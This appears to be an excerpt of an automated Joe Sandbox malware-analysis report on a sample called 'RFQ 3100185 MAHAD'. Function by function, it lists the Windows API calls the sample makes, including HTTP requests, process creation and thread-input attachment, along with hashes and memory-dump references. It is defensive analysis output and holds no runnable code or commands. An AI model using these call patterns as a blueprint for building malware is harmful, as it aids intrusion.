                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CtrlParent
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 1383977212-1403004172
                                                            • Opcode ID: 496d29dd676cbab2fd5eaa37a0a2378a3cbae63b6519fd5408bab043b24535ee
                                                            • Instruction ID: 3eced2d592a76bccf60b70d00c4dcc4f7363ad88d580907e80102558a76cff97
                                                            • Opcode Fuzzy Hash: 496d29dd676cbab2fd5eaa37a0a2378a3cbae63b6519fd5408bab043b24535ee
                                                            • Instruction Fuzzy Hash: D021C4B4900204EFCB05ABA1DC86EFEBBB4EB99300B104115F661972D2DB7D98159B60
                                                            APIs
                                                            • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 007EBA73
                                                            • GetDlgCtrlID.USER32 ref: 007EBA7E
                                                            • GetParent.USER32 ref: 007EBA9A
                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 007EBA9D
                                                            • GetDlgCtrlID.USER32(?), ref: 007EBAA6
                                                            • GetParent.USER32(?), ref: 007EBAC2
                                                            • SendMessageW.USER32(00000000,?,?,00000111), ref: 007EBAC5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CtrlParent
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 1383977212-1403004172
                                                            • Opcode ID: 1fa38ad41a954e4b0ca5590361fceafde0db927b3207ed50453a24ecbc1c61a9
                                                            • Instruction ID: 90f864f1b09bcf2de99f793cab300df6d9e3c9d2e918c4fd479da00913c786c4
                                                            • Opcode Fuzzy Hash: 1fa38ad41a954e4b0ca5590361fceafde0db927b3207ed50453a24ecbc1c61a9
                                                            • Instruction Fuzzy Hash: 1521C1B4900204BBDF01ABA0CC86FFEBB75FF49300F004015F56197291EB7D88299B60
                                                            APIs
                                                            • GetParent.USER32 ref: 007EBAE3
                                                            • GetClassNameW.USER32(00000000,?,00000100), ref: 007EBAF8
                                                            • _wcscmp.LIBCMT ref: 007EBB0A
                                                            • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 007EBB85
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: ClassMessageNameParentSend_wcscmp
                                                            • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                            • API String ID: 1704125052-3381328864
                                                            • Opcode ID: 71174c523e73de090d8bc39b72da2ed0689cf5cff152cccead9ab1de7d70e462
                                                            • Instruction ID: ff9365b4d15ef179e8cf037a35cf45f985c401dd5be4156abc92914d579c37d6
                                                            • Opcode Fuzzy Hash: 71174c523e73de090d8bc39b72da2ed0689cf5cff152cccead9ab1de7d70e462
                                                            • Instruction Fuzzy Hash: 631129B6608753FAFA206735EC0BDA73BACEB29724F200022F955E41D5FFADA8214554
                                                            APIs
                                                            • VariantInit.OLEAUT32(?), ref: 0080B2D5
                                                            • CoInitialize.OLE32(00000000), ref: 0080B302
                                                            • CoUninitialize.OLE32 ref: 0080B30C
                                                            • GetRunningObjectTable.OLE32(00000000,?), ref: 0080B40C
                                                            • SetErrorMode.KERNEL32(00000001,00000029), ref: 0080B539
                                                            • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 0080B56D
                                                            • CoGetObject.OLE32(?,00000000,0083D91C,?), ref: 0080B590
                                                            • SetErrorMode.KERNEL32(00000000), ref: 0080B5A3
                                                            • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0080B623
                                                            • VariantClear.OLEAUT32(0083D91C), ref: 0080B633
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                            • String ID:
                                                            • API String ID: 2395222682-0
                                                            • Opcode ID: b0aa68706d8f9ee879b497ba1693734228e4154ad668edc3cc840b7e71f4ad22
                                                            • Instruction ID: 15157166db87df4ace167f10284facdfeb429a10f341abfaff4180b49cea1886
                                                            • Opcode Fuzzy Hash: b0aa68706d8f9ee879b497ba1693734228e4154ad668edc3cc840b7e71f4ad22
                                                            • Instruction Fuzzy Hash: 24C10171608305AFC740DF68C885A6AB7E9FF88708F04495DF98ADB291DB71ED05CB92
                                                            APIs
                                                            • __swprintf.LIBCMT ref: 007F67FD
                                                            • __swprintf.LIBCMT ref: 007F680A
                                                              • Part of subcall function 007D172B: __woutput_l.LIBCMT ref: 007D1784
                                                            • FindResourceW.KERNEL32(?,?,0000000E), ref: 007F6834
                                                            • LoadResource.KERNEL32(?,00000000), ref: 007F6840
                                                            • LockResource.KERNEL32(00000000), ref: 007F684D
                                                            • FindResourceW.KERNEL32(?,?,00000003), ref: 007F686D
                                                            • LoadResource.KERNEL32(?,00000000), ref: 007F687F
                                                            • SizeofResource.KERNEL32(?,00000000), ref: 007F688E
                                                            • LockResource.KERNEL32(?), ref: 007F689A
                                                            • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 007F68F9
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                            • String ID:
                                                            • API String ID: 1433390588-0
                                                            • Opcode ID: cda4f32e0967c52b9e67b05911a1d6c05283cc9641d673f25a7ddef9ed39836f
                                                            • Instruction ID: ef1f6aef4b4966e205e3a4fc0d9f83381235bc3f0d034cbb69f5d2c8ff9e9c8d
                                                            • Opcode Fuzzy Hash: cda4f32e0967c52b9e67b05911a1d6c05283cc9641d673f25a7ddef9ed39836f
                                                            • Instruction Fuzzy Hash: DD31727190021AEBDB119FA0ED49EBF7BA8FF48380F004829FA16D2250E738D951DB70
                                                            APIs
                                                            • GetCurrentThreadId.KERNEL32 ref: 007F4047
                                                            • GetForegroundWindow.USER32(00000000,?,?,?,?,?,007F30A5,?,00000001), ref: 007F405B
                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 007F4062
                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,007F30A5,?,00000001), ref: 007F4071
                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 007F4083
                                                            • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,007F30A5,?,00000001), ref: 007F409C
                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,007F30A5,?,00000001), ref: 007F40AE
                                                            • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,007F30A5,?,00000001), ref: 007F40F3
                                                            • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,007F30A5,?,00000001), ref: 007F4108
                                                            • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,007F30A5,?,00000001), ref: 007F4113
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                            • String ID:
                                                            • API String ID: 2156557900-0
                                                            • Opcode ID: 3e3132c90f0c7596ea1cd89d9bf0030139f092899e261a7d61d4a9c0ded7adef
                                                            • Instruction ID: de02a327fe5e0ad3a25df1d683ff6498cf6ce734c447dd0a2a2571ee6d57cf31
                                                            • Opcode Fuzzy Hash: 3e3132c90f0c7596ea1cd89d9bf0030139f092899e261a7d61d4a9c0ded7adef
                                                            • Instruction Fuzzy Hash: 0431957150020DAFEB11DF54EC4AB7A77BDBBE4311F108515FA08D6364DB78D9809B62
                                                            APIs
                                                            • GetSysColor.USER32(00000008), ref: 007CB496
                                                            • SetTextColor.GDI32(?,000000FF), ref: 007CB4A0
                                                            • SetBkMode.GDI32(?,00000001), ref: 007CB4B5
                                                            • GetStockObject.GDI32(00000005), ref: 007CB4BD
                                                            • GetClientRect.USER32(?), ref: 0082DD63
                                                            • SendMessageW.USER32(?,00001328,00000000,?), ref: 0082DD7A
                                                            • GetWindowDC.USER32(?), ref: 0082DD86
                                                            • GetPixel.GDI32(00000000,?,?), ref: 0082DD95
                                                            • ReleaseDC.USER32(?,00000000), ref: 0082DDA7
                                                            • GetSysColor.USER32(00000005), ref: 0082DDC5
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                            • String ID:
                                                            • API String ID: 3430376129-0
                                                            • Opcode ID: 4beda6a5c43b3e46046036321bee885291095adf20a0e78b8944fbaee4268bf2
                                                            • Instruction ID: 0ddfe0a397daaf8180bd87b23c8a059d5da25a66cc5a6f55deb2528a2cd6477a
                                                            • Opcode Fuzzy Hash: 4beda6a5c43b3e46046036321bee885291095adf20a0e78b8944fbaee4268bf2
                                                            • Instruction Fuzzy Hash: 4E114C31500745EFDB216BB4FC0AFA97F71FB54325F108A29FA66950E2DB324A91DB20
                                                            APIs
                                                            • EnumChildWindows.USER32(?,007ECF50), ref: 007ECE90
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: ChildEnumWindows
                                                            • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                            • API String ID: 3555792229-1603158881
                                                            • Opcode ID: a0e8c201b135caf6043f508d6c517e052fd26024755a181c78cea1ae8ca99638
                                                            • Instruction ID: 11eb89202dd68463894fa585bd459856cc004212b2529d21dd8362992cbbbb38
                                                            • Opcode Fuzzy Hash: a0e8c201b135caf6043f508d6c517e052fd26024755a181c78cea1ae8ca99638
                                                            • Instruction Fuzzy Hash: 5291F434601686EACB1ADFA1C486BEAFB74FF08300F508559D949E7141DF38A95BCBE0
                                                            APIs
                                                            • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 007B30DC
                                                            • CoUninitialize.OLE32(?,00000000), ref: 007B3181
                                                            • UnregisterHotKey.USER32(?), ref: 007B32A9
                                                            • DestroyWindow.USER32(?), ref: 00825079
                                                            • FreeLibrary.KERNEL32(?), ref: 008250F8
                                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00825125
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                            • String ID: close all
                                                            • API String ID: 469580280-3243417748
                                                            • Opcode ID: 9f7eb2ce7f4218ecf36fd70c1e27b4943ce2e53a21f0028f3b271a173464f0dc
                                                            • Instruction ID: 87def0291e950b560ce7bcf22d86a3199aa1b8b0dca850e28ab3a73e6ac2c0c0
                                                            • Opcode Fuzzy Hash: 9f7eb2ce7f4218ecf36fd70c1e27b4943ce2e53a21f0028f3b271a173464f0dc
                                                            • Instruction Fuzzy Hash: 47912A70600616CFC715EF14D899FA9F3A4FF14304F5482A9E50AA7262DF38AEA6CF50
                                                            APIs
                                                            • SetWindowLongW.USER32(?,000000EB), ref: 007CCC15
                                                              • Part of subcall function 007CCCCD: GetClientRect.USER32(?,?), ref: 007CCCF6
                                                              • Part of subcall function 007CCCCD: GetWindowRect.USER32(?,?), ref: 007CCD37
                                                              • Part of subcall function 007CCCCD: ScreenToClient.USER32(?,?), ref: 007CCD5F
                                                            • GetDC.USER32 ref: 0082D137
                                                            • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0082D14A
                                                            • SelectObject.GDI32(00000000,00000000), ref: 0082D158
                                                            • SelectObject.GDI32(00000000,00000000), ref: 0082D16D
                                                            • ReleaseDC.USER32(?,00000000), ref: 0082D175
                                                            • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0082D200
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                            • String ID: U
                                                            • API String ID: 4009187628-3372436214
                                                            • Opcode ID: c134881b43e5c11d6f66b80d8af07c1327598c841e06f94b58ab1c9a1dab2e38
                                                            • Instruction ID: 12b2d43e92865eb6e9e01bbfce48e98c0e5f8cd9b2cb229c21231a8f902a9d87
                                                            • Opcode Fuzzy Hash: c134881b43e5c11d6f66b80d8af07c1327598c841e06f94b58ab1c9a1dab2e38
                                                            • Instruction Fuzzy Hash: 9571DE30400308DFCF229F64E885AAA7FB5FF58314F14466EED599A2A6D7348C91DB60
                                                            APIs
                                                              • Part of subcall function 007CB34E: GetWindowLongW.USER32(?,000000EB), ref: 007CB35F
                                                              • Part of subcall function 007CB63C: GetCursorPos.USER32(000000FF), ref: 007CB64F
                                                              • Part of subcall function 007CB63C: ScreenToClient.USER32(00000000,000000FF), ref: 007CB66C
                                                              • Part of subcall function 007CB63C: GetAsyncKeyState.USER32(00000001), ref: 007CB691
                                                              • Part of subcall function 007CB63C: GetAsyncKeyState.USER32(00000002), ref: 007CB69F
                                                            • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 0081ED3C
                                                            • ImageList_EndDrag.COMCTL32 ref: 0081ED42
                                                            • ReleaseCapture.USER32 ref: 0081ED48
                                                            • SetWindowTextW.USER32(?,00000000), ref: 0081EDF0
                                                            • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0081EE03
                                                            • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 0081EEDC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                            • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                            • API String ID: 1924731296-2107944366
                                                            • Opcode ID: b428fe8cf415de259be71d8ce4219fedc1d1a62ce4ef3c04d8978024a479bcaa
                                                            • Instruction ID: 8f1f0f0461ae909a563ca7ab30246ed3acd2a1252c5b7744595b001f27f5e535
                                                            • Opcode Fuzzy Hash: b428fe8cf415de259be71d8ce4219fedc1d1a62ce4ef3c04d8978024a479bcaa
                                                            • Instruction Fuzzy Hash: 54517870208304AFDB14DF24DC9AFAA77E8FF98704F00491DF995962A2DB749994CB52
                                                            APIs
                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 008045FF
                                                            • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0080462B
                                                            • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0080466D
                                                            • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00804682
                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0080468F
                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 008046BF
                                                            • InternetCloseHandle.WININET(00000000), ref: 00804706
                                                              • Part of subcall function 00805052: GetLastError.KERNEL32(?,?,008043CC,00000000,00000000,00000001), ref: 00805067
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                            • String ID:
                                                            • API String ID: 1241431887-3916222277
                                                            • Opcode ID: 8ef1af429deb7726e95c27c1b6cff89c1bc4761a2d4455643f579730aabe9e16
                                                            • Instruction ID: 17948e81beb49c293398df648cc3e4720b14e3f23b748b7c92a1c31e63ba6e6a
                                                            • Opcode Fuzzy Hash: 8ef1af429deb7726e95c27c1b6cff89c1bc4761a2d4455643f579730aabe9e16
                                                            • Instruction Fuzzy Hash: DD419DB1541208BFEB129FA4DC89FBB77ACFF09304F00511AFA15DA181EBB19D448BA4
                                                            APIs
                                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0084DC00), ref: 0080B715
                                                            • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0084DC00), ref: 0080B749
                                                            • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0080B8C1
                                                            • SysFreeString.OLEAUT32(?), ref: 0080B8EB
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                            • String ID:
                                                            • API String ID: 560350794-0
                                                            • Opcode ID: f1a33ba2d4e0f9c65a4d5f96b850cb14558b61a498e5bc984d929ecde4817ef8
                                                            • Instruction ID: 76b2c1cffa17ef0d9913b5a5de2c523c7592d7e3f3f543d5bf214e35ca203f38
                                                            • Opcode Fuzzy Hash: f1a33ba2d4e0f9c65a4d5f96b850cb14558b61a498e5bc984d929ecde4817ef8
                                                            • Instruction Fuzzy Hash: A0F11775A00219EFCB44DF94CC88EAEB7B9FF89315F108459F915AB290DB31AE41CB50
                                                            APIs
                                                            • _memset.LIBCMT ref: 008124F5
                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00812688
                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 008126AC
                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 008126EC
                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0081270E
                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0081286F
                                                            • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 008128A1
                                                            • CloseHandle.KERNEL32(?), ref: 008128D0
                                                            • CloseHandle.KERNEL32(?), ref: 00812947
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                            • String ID:
                                                            • API String ID: 4090791747-0
                                                            • Opcode ID: 40660d95ee56dbc032b638e762c7567125a9c1d0887150fcaaa4ea35370d180b
                                                            • Instruction ID: ecf7151835122fd0583e8d306fe5341cc635dcf80ed0ffbe95e561971518b019
                                                            • Opcode Fuzzy Hash: 40660d95ee56dbc032b638e762c7567125a9c1d0887150fcaaa4ea35370d180b
                                                            • Instruction Fuzzy Hash: BBD18D31604240DFCB15EF24C495BAABBE9FF84314F14885DF9999B2A2DB35DC90CB52
                                                            APIs
                                                            • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0081B3F4
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: InvalidateRect
                                                            • String ID:
                                                            • API String ID: 634782764-0
                                                            • Opcode ID: c1fcefb7f3d0a60063e31346eacbea799fad2b0fa8b733a98fe3f0d7c1bad814
                                                            • Instruction ID: 4e749457ad13031835694b4ad167b4ae513f1665b44e4277da5efd1b589659ae
                                                            • Opcode Fuzzy Hash: c1fcefb7f3d0a60063e31346eacbea799fad2b0fa8b733a98fe3f0d7c1bad814
